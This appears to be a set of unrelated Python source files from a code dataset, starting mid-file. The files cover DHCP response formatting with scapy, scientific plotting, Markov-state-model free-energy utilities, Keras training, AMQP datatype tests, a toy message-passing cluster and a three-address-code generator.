@functools.wraps(func)
def formatter(*args, **kwargs):
iface = args[0]
ans = func(*args, **kwargs)
columns = ('iface', 'mac', 'server_ip', 'server_id', 'gateway',
'dport', 'message', 'yiaddr')
data = []
#scapy stores all sequence of requests
#so ans[0][1] would be response to first request
for response in ans:
dhcp_options = dict(_dhcp_options(response[1][DHCP].options))
results = (
iface, response[1][Ether].src, response[1][IP].src,
dhcp_options['server_id'], response[1][BOOTP].giaddr,
response[1][UDP].sport,
DHCPTypes[dhcp_options['message-type']],
response[1][BOOTP].yiaddr)
data.append(dict(zip(columns, results)))
return data
return formatter
def multiproc_map(func):
# multiproc map could not work with format *args
@functools.wraps(func)
def workaround(*args, **kwargs):
args = args[0] if isinstance(args[0], (tuple, list)) else args
return func(*args, **kwargs)
return workaround
def filter_duplicated_results(func):
# due to network infra on broadcast multiple duplicated results
# returned. This helper filter them out
@functools.wraps(func)
def wrapper(*args, **kwargs):
resp = func(*args, **kwargs)
return (dict(t) for t in set([tuple(d.items()) for d in resp]))
return wrapper
| true |
84d8e2cff705ad6b609fe9968df6a2bed63bf54f | Python | Adam110001/Elements_in_Circle_in_Array | /main.py | UTF-8 | 773 | 2.96875 | 3 | [] | no_license | import numpy as np
def minusSide(num):
num -= 1
return num
def plusSide(num):
num += 1
return num
if __name__ == '__main__':
numB = 5
midP = 2
if numB == 5:
z = np.zeros(shape=(numB, numB))
elif (numB / 2) % 5 == 0:
numB += 1
z = np.zeros(shape=(numB, numB))
z[0][midP] = 1
numr = midP
numl = midP
for i in range(1, numB - 1):
one = 0
if i == 3:
one = 1
if one == 1:
z[i][plusSide(numl)] = 1
z[i][minusSide(numr)] = 1
if one == 0:
z[i][minusSide(numl)] = 1
z[i][plusSide(numr)] = 1
numl = minusSide(numl)
numr = plusSide(numr)
z[numB - 1][midP] = 1
print(z)
| true |
562b3fe756ac7c4fa65150b119228260e381297b | Python | remimetzdorff/seconde | /chap/tp_plumarteau/tp_plumarteau_v3/TP Plume/chute_libre.py | UTF-8 | 1,298 | 2.921875 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
#########
# DONNÉES
#########
t = np.array([0.00, 0.45, 0.90, 1.35, 1.80, 2.25, 2.70])
X = np.array([0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00])
Y = np.array([0.00, 0.97, 3.89, 8.75, 15.56, 24.31, 35.00])
####################################################
# REPRÉSENTATION GRAPHIQUE DES POSITIONS SUCCESSIVES
####################################################
fig = plt.figure(figsize=(8,6))
plt.plot(X, Y, "o")
##################
# VECTEURS VITESSE
##################
x = -15
y = 8.75
vx = 17
vy = 5
#plt.quiver(x, y, vx, vy, color="red", angles='xy',scale=1.5, scale_units='xy')
############################
# MISE EN FORME DU GRAPHIQUE
############################
# Titre, nom des axes et légende
plt.title("Chute libre d'une plume dans le vide")
plt.xlabel("Position latérale (m)")
plt.ylabel("Distance depuis le point du laché (m)")
# Décorations
ax = fig.axes[0]
ax.set_yticks(Y)
ax.invert_yaxis()
for i, tick in enumerate(Y):
ax.annotate(r"$M_{%i}$"%(i), (0, tick), color="C0", textcoords="offset points", xytext=(10,2))
ax.plot([-20,20], [35, 35], 'k',zorder=1)
ax.fill_between([-20,20], [35, 35], [40, 40], facecolor='k', alpha=0.25)
ax.annotate("SOL", (-15, 37.5), ha="center", va="center")
plt.show() | true |
0ac3a254d1683263d7ce0cef27a5c58e0d8cb1fe | Python | HWaymentSteele/kinase_msm | /kinase_msm/plotting_utils.py | UTF-8 | 15,245 | 2.75 | 3 | [] | no_license | #!/bin/evn python
import pandas as pd
import numpy as np
from .mdl_analysis import _map_obs_to_state
from scipy.stats import gaussian_kde
"""
set of helper routines to plot things
"""
def scipy_kde(pr_mdl, pop_vector=None, obs=(0,1),
n_samples=30000, bw_method='scott'):
"""
Returns a opulation weighted kernel. Useful for plotting things
:param pr_mdl: The protein mdl to use
:param pop_vector: Population vector to use when sampling tic values.
Defaults to the msm population vector if None is given.
:param obs: Tuple of either dictionaries or ints. Defaults to 0 and 1st tic
:param n_samples: The number of samples to use to fit the kde
:param bw_method: See scipy gaussian kde.
:return: The fitted kernel, and the
"""
if pop_vector is None:
pop_vector = pr_mdl.msm.populations_
states_to_sample = np.random.choice(pr_mdl.n_states_,
n_samples, p=pop_vector)
if len(obs)!=2:
raise ValueError("Length of observable needs to be 2")
if type(obs[0])==int:
x_obs = pr_mdl.tic_dict[obs[0]]
y_obs = pr_mdl.tic_dict[obs[1]]
elif type(obs[0])==dict:
x_obs = obs[0]
y_obs = obs[1]
else:
raise ValueError("The obs list needs to either be a list of ints(for tics)"
"or list of state keyed dictionaries")
_x_val = []
_y_val = []
b_c, bin_edges = np.histogram(states_to_sample,
bins=np.arange(pr_mdl.n_states_+1))
for i in range(pr_mdl.n_states_):
#have at least 5 samples
ind = np.random.choice(len(x_obs[i]), np.max((5, b_c[i])))
_x_val.extend(np.array(x_obs[i])[ind])
_y_val.extend(np.array(y_obs[i])[ind])
kernel = gaussian_kde(np.vstack((_x_val,_y_val)), bw_method=bw_method)
return kernel, _x_val, _y_val
def two_dim_free_energy_kde(pr_mdl, limits_dict={}, pop_vector=None,
obs=(0,1), n_samples=30000,
bw_method='scott',
mlp_fct=1.0):
"""
Get a free energy landscape for a protein mdl
:param pr_mdl: The protein mdl under consideration
:param limits_dict: Limits of the tics being considered
:param pop_vector: optional population vector. Defaults to the msm pop.
:param obs: Tuple of either dictionaries or ints. Defaults to 0 and 1st tic
:param n_samples: Number of samples to use. defaults to 30000
:param bw_method: Band width method for the kernel. Defaults to "scott"
:param mlp_fct: Multiplicative factor for the boundaries to allow the "extra"
edges around the data to make smoother kde plots
:return: X,Y, and a population weighted free energy map(in kcals/mol). Use
contourf(X,Y, f) to plot the results. Limit levels to something reasonable
to account to the non-existant tic spaces
"""
kernel, x, y = scipy_kde(pr_mdl, pop_vector, obs, n_samples, bw_method)
if not limits_dict and type(obs[0])==int:
limits_dict = global_tic_boundaries([pr_mdl], obs)
if type(obs[0])==int:
X = mlp_fct*limits_dict[obs[0]]
Y = mlp_fct*limits_dict[obs[1]]
else:
X = mlp_fct*limits_dict[0]
Y = mlp_fct*limits_dict[1]
n_p = limits_dict[0].shape[0]
X,Y = np.meshgrid(X,Y)
#create a massive n*2 array
positions = np.vstack([X.ravel(), Y.ravel()])
return X, Y, -.6 * np.log(kernel.evaluate(positions)).reshape(n_p, n_p)
def global_tic_boundaries(prt_list, tic_list, n_bins=100):
"""
:param prt_list: list of proteins loaded using the Protein class
:param tic_list: list of tics to compute for
:return:a dictionary where the key is the tic index and the value is
list containing the linearly spaced tic value going from the global min
and max
"""
assert isinstance(prt_list,list)
results_dict = {}
for tic_index in tic_list:
min_tic_val = min([prot.tic_min[tic_index] for prot in prt_list])
max_tic_val = max([prot.tic_max[tic_index] for prot in prt_list])
results_dict[tic_index] = np.linspace(min_tic_val,max_tic_val,n_bins)
return results_dict
def _one_dim_histogram(populations_, x_dict, x_array):
n_bins = len(x_array)-1
H_overall = np.zeros(n_bins)
n_states_= populations_.shape[0]
H={}
for i in range(n_states_):
H[i],x=np.histogram(x_dict[i],bins=x_array,
normed=True)
H_overall = H_overall + populations_[i]*H[i]
#convert to kcal/mol by
H_overall = -0.6*np.log(H_overall)
return H, H_overall
def _two_dim_histogram(populations_, x_obs, y_obs, x_array, y_array):
n_bins = len(x_array)-1
H_overall = np.zeros((n_bins,n_bins))
n_states_= populations_.shape[0]
H={}
for i in range(n_states_):
H[i], x, y=np.histogram2d(x_obs[i], y_obs[i],
bins=[x_array, y_array],
normed=True)
H_overall = H_overall + populations_[i]*H[i]
#convert to kcal/mol by
H_overall = -0.6*np.log(H_overall)
return H, H_overall
def tica_histogram(prj, prt, tic_list, x_array=None, y_array=None, n_bins=100):
#simple check for making sure we have a list
if not isinstance(tic_list, list):
tic_list = [tic_list]
c_x = prt.tic_dict[tic_list[0]]
if x_array is None:
lin_spaced_tic = global_tic_boundaries([prt],tic_list,n_bins)
x_array = lin_spaced_tic[tic_list[0]]
if y_array is None and len(tic_list)==2:
y_array =lin_spaced_tic[tic_list[1]]
c_y = prt.tic_dict[tic_list[1]]
x_center = (x_array[:-1] + x_array[1:]) / 2
if len(tic_list)==1:
H, H_overall = _one_dim_histogram(prt.msm.populations_,
c_x, x_array)
elif len(tic_list)==2:
H, H_overall = _two_dim_histogram(prt.msm.populations_,
c_x, c_y, x_array, y_array)
else:
raise Exception("cant do this")
return H, H_overall, x_center
def bootstrap_one_dim_free_energy(prt, obs, bins=100):
"""
:param prt: Protein model
:param obs: observable
:param bins: bins(either int or array)
:return:
"""
free_energy = []
if bins is None or type(bins)==int:
max_val = np.max(np.concatenate(list(obs.values())))
min_val = np.min(np.concatenate(list(obs.values())))
bins = np.linspace(min_val, max_val, bins)
else:
n_bins = len(bins) - 1
state_x_obs_dict = _map_obs_to_state(prt, obs)
#get the centers stacked nicely
_labels = ["mean","lower","upper"]
nlbl = len(_labels)
tic_cen = np.repeat([(bins[:-1] + bins[1:]) / 2],
nlbl,axis=0).flatten()
protein_name = np.repeat(prt.name, nlbl * n_bins).flatten()
mdl_index = np.array([np.repeat(_labels[i],n_bins)
for i in range(nlbl)]).flatten()
#get data
H,H_msm = _one_dim_histogram(prt.msm.populations_
,state_x_obs_dict,x_array=bins)
mean_ = prt.bootrap_msm.mapped_populations_mean_
lower_ = prt.bootrap_msm.mapped_populations_mean_\
- 1.96*prt.bootrap_msm.mapped_populations_sem_
upper_ = prt.bootrap_msm.mapped_populations_mean_\
+ 1.96*prt.bootrap_msm.mapped_populations_sem_
_data = [mean_, lower_, upper_]
for pop,lbl in zip(_data, _labels):
H_overall=np.zeros(n_bins)
assert(len(pop)==len(H.keys()))
for j in range(prt.n_states_):
H_overall = H_overall + pop[j]*H[j]
#print(pop[j],H[j])
#convert to free enenrgy
if np.all(np.isnan(H_overall)):
print(pop,lbl,type(H))
H_overall = -0.6*np.log(H_overall)
free_energy.extend(H_overall)
df=pd.DataFrame([list(tic_cen),list(free_energy),list(protein_name),list(mdl_index)]).T
df.columns=["obs_value","free_energy","protein_name","mdl_index"]
return df
def bootstrap_one_dim_tic_free_energy(prj,prt,tic_index,n_bins=100 ,lin_spaced_tic=None):
"""
:param prj: Project that the protein is a part of
:param prt: the protein itself
:param tic_index: The tic index that is needed
:param n_bins: n_bins
:param lin_spaced_tic: linearly sampled tic
:param errorbars: whether or not to compute multiple free enegies
using bayes msm mdl
:return: a pandas dataframe containing the free energy for the
every point along the tic coordinate. The mdl index column contains
an integer for each of the bayesian mdls.
"""
free_energy = []
if lin_spaced_tic is None:
lin_spaced_tic = global_tic_boundaries([prt],tic_index,n_bins)[tic_index]
else:
n_bins = len(lin_spaced_tic) - 1
#get the centers stacked nicely
_labels = ["mean","lower","upper"]
nlbl = len(_labels)
tic_cen = np.repeat([(lin_spaced_tic[:-1] + lin_spaced_tic[1:]) / 2],
nlbl,axis=0).flatten()
protein_name = np.repeat(prt.name, nlbl * n_bins).flatten()
mdl_index = np.array([np.repeat(_labels[i],n_bins)
for i in range(nlbl)]).flatten()
#get data
H,H_msm,_ = tica_histogram(prj,prt,tic_index,x_array=lin_spaced_tic)
prt.bootrap_msm.mapped_populations_[prt.bootrap_msm.mapped_populations_==0]=np.nan
mean_ = np.nanmean(prt.bootrap_msm.mapped_populations_,axis=0)
lower_ = np.nanpercentile(prt.bootrap_msm.mapped_populations_,5,axis=0)
upper_ = np.nanpercentile(prt.bootrap_msm.mapped_populations_,95,axis=0)
_data = [mean_, lower_, upper_]
for pop,lbl in zip(_data, _labels):
H_overall=np.zeros(n_bins)
for j in range(prt.n_states_):
H_overall = H_overall + pop[j]*H[j]
#convert to free enenrgy
H_overall = -0.6*np.log(H_overall)
free_energy.extend(H_overall)
df=pd.DataFrame([list(tic_cen),list(free_energy),list(protein_name),list(mdl_index)]).T
df.columns=["tic_value","free_energy","protein_name","mdl_index"]
return df
def one_dim_tic_free_energy(prj, prt, tic_index, n_bins=100 ,
lin_spaced_tic=None, errorbars=False, use_mean=True):
"""
:param prj: Project that the protein is a part of
:param prt: the protein itself
:param tic_index: The tic index that is needed
:param n_bins: n_bins
:param lin_spaced_tic: linearly sampled tic
:param errorbars: whether or not to compute multiple free enegies
using the msm mdl
:return: a pandas dataframe containing the free energy for the
every point along the tic coordinate. The mdl index column contains
"mle" for the msm free energy and an integer for the bayesian mdl
"""
free_energy = []
if lin_spaced_tic is None:
lin_spaced_tic = global_tic_boundaries([prt],tic_index,n_bins)[tic_index]
else:
n_bins = len(lin_spaced_tic) - 1
#get the centers stacked nicely
tic_center = np.repeat([(lin_spaced_tic[:-1] + lin_spaced_tic[1:]) / 2],
1 , axis=0).flatten()
protein_name = np.repeat(prt.name,n_bins).flatten()
mdl_index = np.repeat("mle",n_bins).flatten()
#get data
H,H_msm,_ = tica_histogram(prj,prt,[tic_index],x_array=lin_spaced_tic)
free_energy.extend(H_msm)
msm_df=pd.DataFrame([list(tic_center),list(free_energy),
list(protein_name),list(mdl_index)]).T
msm_df.columns=["tic_value","free_energy","protein_name","mdl_index"]
if errorbars:
bootstrap_df = bootstrap_one_dim_tic_free_energy(prj,prt,tic_index, lin_spaced_tic=lin_spaced_tic)
df = pd.concat([msm_df, bootstrap_df])
return df
else:
return msm_df
def two_dim_tic_free_energy(prj, prt, tic_list, x_array=None, y_array=None, n_bins=100, use_mean=True):
#basic sanity tests
assert(len(tic_list)==2)
if x_array is None:
lin_spaced_tic = global_tic_boundaries([prt],tic_list,n_bins)
x_array = lin_spaced_tic[tic_list[0]]
y_array = lin_spaced_tic[tic_list[1]]
else:
n_bins = len(x_array) - 1
H_overall = np.zeros((n_bins,n_bins))
#get data
c_x = prt.tic_dict[tic_list[0]]
c_y = prt.tic_dict[tic_list[1]]
if use_mean:
H, H_overall = _two_dim_histogram(prt.bootrap_msm.mapped_populations_mean_,
c_x,c_y,x_array, y_array)
else:
H, H_overall = _two_dim_histogram(prt.msm.populations_, c_x, c_y, x_array, y_array)
return H_overall
def one_dim_free_energy(prt, obs, bins=100, errorbars=False):
"""
:param prt: Protein
:param obs: Dictonary of obs for every frame
:param bins: either a list of lin_space_points or number of bins to use
:return: a pandas dataframe containing the free energy for the
every point along the tic coordinate.
"""
free_energy = []
if bins is None or type(bins)==int:
max_val = np.max(np.concatenate(list(obs.values())))
min_val = np.min(np.concatenate(list(obs.values())))
bins = np.linspace(min_val, max_val, bins)
else:
n_bins = len(bins) - 1
state_x_obs_dict = _map_obs_to_state(prt, obs)
#get the centers stacked nicely
tic_center = np.repeat([(bins[:-1] + bins[1:]) / 2],
1 , axis=0).flatten()
protein_name = np.repeat(prt.name,n_bins).flatten()
mdl_index = np.repeat("mle",n_bins).flatten()
#get data
H,H_msm = _one_dim_histogram(prt.msm.populations_
,state_x_obs_dict,x_array=bins)
free_energy.extend(H_msm)
msm_df=pd.DataFrame([list(tic_center),list(free_energy),
list(protein_name),list(mdl_index)]).T
msm_df.columns=["obs_value","free_energy","protein_name","mdl_index"]
if errorbars:
bootstrap_df = bootstrap_one_dim_free_energy(prt, obs, bins=bins)
df = pd.concat([msm_df, bootstrap_df])
return df
else:
return msm_df
def two_dim_free_energy(prt, x_obs, y_obs, bins=None):
"""
:param prt: protein model
:param x_obs: x_obs for every trajectory
:param y_obs: y_obs for every trajetory
:param bins: either list of lists or int
:return:
"""
state_x_obs_dict = _map_obs_to_state(prt, x_obs)
state_y_obs_dict = _map_obs_to_state(prt, y_obs)
if bins is None or type(bins)==int:
max_x_val = np.max(np.concatenate(list(x_obs.values())))
min_x_val = np.min(np.concatenate(list(x_obs.values())))
max_y_val = np.max(np.concatenate(list(y_obs.values())))
min_y_val = np.min(np.concatenate(list(y_obs.values())))
x_array = np.linspace(min_x_val, max_x_val, bins)
y_array = np.linspace(min_y_val, max_y_val, bins)
else:
x_array = bins[0]
y_array = bins[1]
H, H_msm = _two_dim_histogram(prt.msm.populations_,
state_x_obs_dict,
state_y_obs_dict,
x_array,
y_array)
return H, H_msm
| true |
acd1dc77d5f6002d103a8f8e51079d4bb5625bcb | Python | obsiwitch/edupr5melkman | /src/utils.py | UTF-8 | 905 | 3.25 | 3 | [] | no_license | import types
# Iterable SimpleNamespace.
class Table(types.SimpleNamespace):
def __iter__(self):
for k, v in self.__dict__.items(): yield v
# Iterable keeping track of the current element.
class Iter:
def __init__(self, collection):
self.collection = collection
self.i = -1
@property
def j(self): return self.i if self.i > -1 else 0
def processed(self, reverse = False):
return self.collection[0 : self.j + 1] if not reverse \
else self.collection[self.j :: -1]
def remaining(self): return self.collection[self.j + 1 :]
@property
def current(self):
if self.collection: return self.collection[self.j]
@property
def finished(self): return (self.i == len(self.collection) - 1)
def next(self):
if self.i + 1 < len(self.collection):
self.i += 1
return self.collection[self.i]
| true |
dd68395c81b8a2678252149a3b30502382354eb2 | Python | ointaj/VNSP | /src/messages.py | UTF-8 | 285 | 2.78125 | 3 | [] | no_license |
class cErrorMessages:
@staticmethod
def CantOpenFile():
print("Can't open the file !")
@staticmethod
def CantWriteToFile():
print("Can't write to file")
@staticmethod
def StorageError():
print("Error of creating storage for game !")
| true |
846363d81683de9177f333e7a478f6d019c1b01d | Python | danaimone/Blind_75 | /Graphs/course_schedule.py | UTF-8 | 1,273 | 3.40625 | 3 | [] | no_license | from typing import List
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
from collections import defaultdict
course_dict = defaultdict(list)
for relation in prerequisites:
next_course, previous_course = relation[0], relation[1]
course_dict[previous_course].append(next_course)
checked = [False for _ in range(numCourses)]
path = [False for _ in range(numCourses)]
for current_course in range(numCourses):
if self.isCyclic(current_course, course_dict, checked, path):
return False
return True
def isCyclic(self, current_course, course_dict, checked, path):
if checked[current_course]: # node has already been checked and no cycle could be formed
return False
if path[current_course]: # current course index had a path
return True
path[current_course] = True
is_cycle = False
for child in course_dict[current_course]:
is_cycle = self.isCyclic(child, course_dict, checked, path)
if is_cycle:
break
path[current_course] = False
checked[current_course] = True
return is_cycle | true |
3a44dc430791d348812ec58a112f23f31b5da8e8 | Python | ekimekim/grabbit | /grabbit/frames/tests/test_datatypes.py | UTF-8 | 1,832 | 2.703125 | 3 | [] | no_license |
from unittest import main
from grabbit.frames.datatypes import *
from common import FramesTestCase
class DatatypeTests(FramesTestCase):
def test_octet(self):
self.check(Octet, '\xab', 0xab)
def test_short(self):
self.check(Short, '\xbe\xef', 0xbeef)
def test_long(self):
self.check(Long, '\xde\xad\xbe\xef', 0xdeadbeef)
def test_longlong(self):
self.check(LongLong, '\x00\x0d\xef\xac\xed\xfa\xca\xde', 0x000defacedfacade)
def test_shortstring(self):
self.check(ShortString, '\x0bhello world', "hello world")
def test_longstring(self):
self.check(LongString, '\x00\x00\x00\x0bhello world', "hello world")
def test_bits(self):
TestFlags = Bits('foo', 'bar', 'baz')
self.check(TestFlags, '\x03', (True, True, False))
def test_bits_big(self):
BigTestFlags = Bits('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j')
self.check(BigTestFlags,
'\x35\x02',
(True, False, True, False, True, True, False, False, False, True))
def test_bits_properties(self):
TestFlags = Bits('foo', 'bar', 'baz')
flags = TestFlags((True, False, True))
self.assertEquals((flags.foo, flags.bar, flags.baz), (True, False, True))
def test_proto_header(self):
self.check(ProtocolHeader, 'AMQP\x00\x00\x09\x01')
def test_sequence(self):
class TestSequence(Sequence):
fields = [
(None, ShortString, ''),
('one', Short),
(None, Bits('two', 'three')),
('four', ShortString, 'test'),
('five', Short, 5),
]
obj = TestSequence(1, two=True, three=False, five=3)
self.assertEquals(obj.one, 1)
self.assertEquals(obj.two, True)
self.assertEquals(obj.three, False)
self.assertEquals(obj.four, "test")
self.assertEquals(obj.five, 3)
self.check(TestSequence, '\x00\x00\x01\x01\x04test\x00\x03', 1, two=True, three=False, five=3)
if __name__ == '__main__':
main()
| true |
84533e99bf66f555fa73defbae8460f6c9c0e241 | Python | M2odrigo/keras_metrics | /train_normalize_data_old.py | UTF-8 | 2,932 | 3.09375 | 3 | [] | no_license | # Create your first MLP in Keras
from desviation_function import calc_metric
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
import numpy as np
# fix random seed for reproducibility
np.random.seed(7)
##variables
cant_epoch = 0
batch_size = 100
###
# load pima indians dataset
dataset = np.loadtxt("pima-indians-diabetes.csv", delimiter=",")
#normalize the data
scaler = StandardScaler()
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
#normalizar los valores del train set
X = scaler.fit_transform(X)
# create model
model = Sequential()
model.add(Dense(12, input_dim=8, activation='sigmoid'))
model.add(Dense(8, activation='sigmoid'))
model.add(Dense(1, activation='sigmoid'))
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# Fit the model
model.fit(X, Y, epochs=cant_epoch, batch_size=batch_size)
# evaluate the model
scores = model.evaluate(X, Y)
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
print(model.summary())
print("#########outputs of hidden layer 1 with 12 nodes#################")
model2 = Sequential()
model2.add(Dense(12, input_dim=8, weights=model.layers[0].get_weights(), activation='sigmoid'))
activations2 = model2.predict_proba(X)
#print(activations2)
a2 = np.asarray(activations2)
desviation_one = calc_metric(1, 12, a2, Y)
print("desviation_one",desviation_one)
print("desviation_class0e",desviation_one[0])
print("desviation_class1e",desviation_one[1])
#np.savetxt(str(cant_epoch) + "_epoch_hidden1.csv", h2, fmt = '%.5f', delimiter=",")
print("#########outputs of hidden layer 2 with 8 nodes#################")
model3 = Sequential()
model3.add(Dense(8, input_dim=12, weights=model.layers[1].get_weights(), activation='sigmoid'))
activations3 = model3.predict_proba(activations2)
#print(activations3)
a3 = np.asarray(activations3)
desviation_two = calc_metric(2, 8, a3, Y)
print("desviation_two",desviation_two)
print("desviation_class0e",desviation_two[0])
print("desviation_class1e",desviation_two[1])
#h3 = []
#for index, w in enumerate(a3):
# h3.append(np.append([a3[index]], [Y[index]]))
#np.savetxt(str(cant_epoch) + "_epoch_hidden2.csv", h3, fmt = '%.5f', delimiter=",")
print("#########outputs of output layer with 1 node#################")
model4 = Sequential()
model4.add(Dense(1, input_dim=8, weights=model.layers[2].get_weights(), activation='sigmoid'))
activations4 = model4.predict_proba(activations3)
#print(activations4)
a4 = np.asarray(activations4)
desviation_three = calc_metric(3, 1, a4, Y)
print("desviation_three",desviation_three)
print("desviation_class0e",desviation_three[0])
print("desviation_class1e",desviation_three[1])
#h4 = []
#for index, w in enumerate(a4):
# h4.append(np.append([a4[index]], [Y[index]]))
#np.savetxt(str(cant_epoch) + "_epoch_output.csv", h4, fmt = '%.5f', delimiter=",")
| true |
754e058181171b81cd9641cd4393c82b5e5ffa8b | Python | aiyingsuccess/machinelearning | /finalbasic.py | UTF-8 | 1,542 | 2.515625 | 3 | [] | no_license | from __future__ import print_function
from pandas import read_csv
import math
import numpy as np
import pandas as pd
import random
import matplotlib.pyplot as plt
dataset = read_csv('/home/aiying/Machinelearning/dataorigin.csv')
headers = list(dataset)
ds=dataset.values.tolist()
modset=[]
modframe=[]
modframelen=[]
testcolumnameset=[]
testcolumnset=[]
colvalues=[]
j=-1
for i in headers:
j=j+1
indexNames = dataset[i].index[dataset[i].apply(np.isnan)]
if len(indexNames)==0:
continue
newds=dataset.drop(indexNames)
modframe.append(newds)
lnewds=newds.values.tolist()
modset.append(lnewds)
modframelen.append(len(lnewds))
testcolumnameset.append(i)
testcolumnset.append(j)
values=pd.unique(dataset[i])
colvalues.append(values)
print('sum of columns have missing data', len(modset))
print('shortest column',min(modframelen))
i=0
with open('colmissing.'+'txt', 'w') as f:
for item in testcolumnset:
f.write("%s\t" % item )
f.write("%s\t"%headers[item])
f.write("%s\t" % modframelen[i])
f.write("%s\n"%len(colvalues[i]))
i=i+1
with open('numberofcolmissing.'+'txt', 'w') as f:
for item in modframelen:
f.write("%s," % item )
# i=-1
# colrefine=[]
# for item in modframelen:
# i=i+1
# if item<4800:
# colrefine.append(testcolumnset[i])
# with open('colrefine.'+'txt', 'w') as f:
# for item in colrefine:
# f.write("%s," % item )
| true |
638ee9e488194d8d8b81d8031b952de2cdeb8742 | Python | krestenkrab/500lines | /cluster/bb_network.py | UTF-8 | 2,267 | 2.765625 | 3 | [
"CC-BY-3.0",
"MIT"
] | permissive | import logging
from multiprocessing import Process, Queue
# Remove from final copy:
# - logging
network = {}
class Node(object):
def __init__(self, address):
self.q = Queue()
self.address = address
self.logger = logging.getLogger('node.%s' % address)
network[self.address] = self.q
def send(self, destinations, action, **kwargs):
self.logger.debug("sending %s with args %s to %s" % (action, kwargs, destinations))
for dest in destinations:
network[dest].put((action, kwargs))
class Member(Node, Process):
def __init__(self, execute_fn, address):
Node.__init__(self, address)
Process.__init__(self, name=address)
self.execute_fn = execute_fn
def run(self):
while True:
action, kwargs = self.q.get()
if not action:
return
self.logger.debug("received %r with args %r" % (action, kwargs))
getattr(self, 'do_%s' % action)(**kwargs)
def join(self):
self.q.put((None, None))
Process.join(self)
def start(self, initial_value=None):
self.state = initial_value
Process.start(self)
def invoke(self, input):
self.state, output = self.execute_fn(self.state, input)
return output
def do_INVOKE(self, input, caller):
self.send([caller], 'INVOKED', output=self.invoke(input))
class Client(Node):
def __init__(self, address, member_address):
Node.__init__(self, address)
self.member_address = member_address
def invoke(self, input):
self.send([self.member_address], 'INVOKE', input=input, caller=self.address)
action, kwargs = self.q.get()
self.logger.debug("received %r with args %r" % (action, kwargs))
return kwargs['output']
def sequence_generator(state, input):
return state+input, range(state, state+input)
if __name__ == "__main__":
logging.basicConfig(format="%(asctime)s %(name)s proc=%(processName)s %(message)s", level=logging.DEBUG)
member = Member(sequence_generator, address='memb1')
client = Client('client', member.address)
member.start(initial_value=0)
print client.invoke(4)
print client.invoke(1)
member.join()
| true |
a3b4d9d3bcdf79fa872469a1dac8ce96300e714e | Python | rajesh-cric/pythonchallenges.py | /code4.py | UTF-8 | 197 | 3.484375 | 3 | [] | no_license | print("***tax Program***")
price=float(input("how much did you pay?: "))
if price>=1.00:
tax=0.07
print('tax rate is:'+str(tax))
else:
tax=0
print('tax rate is:'+str(tax))
| true |
5e813ff1b146cd92d09447327f739b1cb065ddcd | Python | ekitanidis/heart4cast | /utils.py | UTF-8 | 896 | 3.34375 | 3 | [] | no_license | import numpy as np
from itertools import groupby
def find_consec(data, size):
""" Finds all groups of contiguous numbers of a given size in data. These groups may overlap.
Returns a list of tuples, where each tuple is the pair of indices in data enclosing the group.
"""
# find groups of contiguous numbers of minimum size
ipairs = []
k = 0
for key, group in groupby(enumerate(data), lambda x:x[0]-x[1]):
elems = len(list(group))
if elems >= size:
ipairs.append((k, k + elems - 1))
k+=elems
# split larger groups into multiple overlapping groups of exact size
spairs = ipairs.copy()
for i in ipairs:
if (i[1] - i[0] + 1) > size:
s = [(i[0] + j, i[0] + j + size - 1) for j in range(0, (i[1] - i[0] + 1) - size + 1, 1)]
spairs.remove(i)
spairs.extend(s)
return spairs
| true |
d0f3233f10e832c521bff393c8dac104b65552ca | Python | anaskhan96/r2ic | /src/code.py | UTF-8 | 4,740 | 2.796875 | 3 | [
"MIT"
] | permissive | class ThreeAddressCode:
def __init__(self):
self.symbolTable = None
self.allCode = []
self.tempVarCount = 0
self.loop_statement_count = 0
self.loop_status = ''
self.loop_unroll = False
self.loop_values = []
def loop_begin(self):
self.loop_status = 'begin'
def loop_end(self):
self.loop_status = 'end'
def generateCode(self, operation, arg1, arg2, result):
code = Quadruple(operation, arg1, arg2, result)
self.allCode.append(code)
def print_code(self):
print("\tOperation\tArg1\t\tArg2\t\tResult")
for i in self.allCode:
print("\t", i.operation, "\t\t", i.arg1, "\t\t", i.arg2, "\t\t", i.result)
def generate_icg(self, operation, arg1, arg2, result):
if self.loop_status =='begin':
self.loop_statement_count +=1
if operation == "goto":
self.generateCode(operation, arg1, arg2, result)
elif operation == 'print':
self.generateCode("SWI", '', '', result)
elif operation.endswith("F"):
self.generateCode(operation, str(arg1), str(arg2), result)
elif operation == "=":
if type(arg1) == str:
if arg1 in self.symbolTable.symbols.keys():
value = self.symbolTable.lookup(arg1)[2]
if type(value) == int:
self.generateCode(operation, value, '', result)
# updation of id in symbol table
value1 = self.symbolTable.lookup(result)
value1[2] = value
self.symbolTable.symbols[result] = value1
else:
self.generateCode(operation, arg1, '', result)
else:
self.generateCode(operation, arg1, '', result)
# updation of id in symbol table
value = self.symbolTable.lookup(result)
value[2] = arg1
self.symbolTable.symbols[result] = value
elif operation in ["+", "-" , "*", "/"]:
# operation is either +,-,*,/
if type(arg1) == int and type(arg2) == int:
self.tempVarCount += 1
temp = 't'+str(self.tempVarCount)
self.symbolTable.insert(temp, [0, 'ID', result, "global", "-"])
else:
self.tempVarCount += 1
temp = 't'+str(self.tempVarCount)
if type(arg1) == str and type(arg2) == int:
val = self.symbolTable.lookup(arg1)[2]
if val != '~':
res = 0
if operation == '+':
res = val + arg2
elif operation == '-':
res = val - arg2
elif operation == '*':
res = val * arg2
elif operation == '/':
res = val / arg2
self.symbolTable.insert(temp, [0, 'ID', res, "global", "-"])
else:
self.generateCode(operation, arg1, arg2, temp)
self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
elif type(arg1) == int and type(arg2) == str:
val = self.symbolTable.lookup(arg2)[2]
if val != '~':
res = 0
if operation == '+':
res = arg1 + val
elif operation == '-':
res = arg1 - val
elif operation == '*':
res = arg1 * val
elif operation == '/':
res = arg1 / val
self.symbolTable.insert(temp, [0, 'ID', res, "global", "-"])
else:
self.generateCode(operation, arg1, arg2, temp)
self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
else:
self.generateCode(operation, arg1, arg2, temp)
